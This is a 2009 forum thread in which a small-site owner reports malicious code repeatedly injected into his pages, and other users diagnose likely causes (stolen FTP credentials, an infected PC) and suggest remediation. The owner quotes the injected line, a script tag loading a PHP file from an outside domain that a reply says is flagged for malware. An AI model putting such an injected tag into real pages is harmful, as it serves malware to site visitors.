Urgent help needed

[Danzetec]

Hi guys I'm in a bit of a pickle, due to my lack of IT experience I think I have left my website unsecured by uploading my data to the hosting server using plain FTP.

 

I now know this is a complete no-no and should be using SFTP and have been trying to learn how to add SSH encryption keys but its a bit above my level, especially at short notice

 

The problem is bad code keeps getting added to my pages but what should I do now its been hacked? Do I just need to re-upload with SFTP and it will be ok??

 

I'm unfortunately not conversant with Dreamweaver and have just used a basic HTML editing program and uploader to make my site (AceHTML Freeware and AceFTP 3 Pro). But if anyone has knowledge of Aceftp 3 Pro and how to setup the security encription that would be great.

 

If anyone can help, or point me in the direction of some help for IT noobs that'd much appreciated

[Stu]

99.9% of people upload stuff to their website by using FTP. It is HIGHLY unlikely you have been hacked because of this.

 

The chances are there is some code in your existing site which someone is exploiting or they simply know your password. It could also be your desktop machine that has been compromised, not your website/webserver.

 

Feel free to PM me if you want me to take a look.

[Danzetec]

Cheers Stu , you got PM

[Gadge]

What is the new piece of code that's been added actually doing?

 

Do you have backup's of your whole site in a "fresh state"? I'd consider backing them up to a external drive as-well as any other important files and be ready to do a complete format of your home system. Have all usernames / passwords changed (on a machine that is uninfected) and maybe even consider bank cards etc.. to be vulnerable if used on that machine or even on the network.

 

I would agree with Stu and point towards your home machine having provided the access in one way or another not the transfer method.

 

Do you keep web logs to find who has had access to the web server?

 

BTW using Dreamweaver wouldn't make your site any more secure then using notepad to write your code. Its just another piece of software to aid the user. I have written most of my PHP coding for my final year project using notepad++

 

It looks like you are using Paypal to deal with the checkout procedures on the website?

Edited November 19, 2009 by Gadge

[stoo2000]

We've seen this alot in the cPanel community, It's most likley an actual virus on your own computer that finds stored FTP details and uploads the malicious code to your websites, so even if you used different FTP methods, it wouldn't stop it.

 

Change your FTP password, and do some anti-virus scans of your PC(s)

[Danzetec]

I uploaded fresh data last night and the site was fine but I have checked the file manager for my server and at 04:43 this morning the code was changed. My computers were obviously off at this time so could this mean it eliminates my computers??

 

The following bad code has been inserted before the main page body

 

<script src=http://gasthaus-engel.org/Fireworks/myStyles.php ></script>

 

I'm running scans on my computers but am going to fresh-install my home PC and dedicate it for FTP uploads

[stoo2000]

It depends if it was changed after you uploaded and before you turned your computers off. Inform your web hosting provider of the issue, they should then have a look at their server logs and be able to tell how that file was modified and at what time.

[Gadge]

Google has flagged that site many times for distributing Malware, so it is likely to be an automated task effecting many people.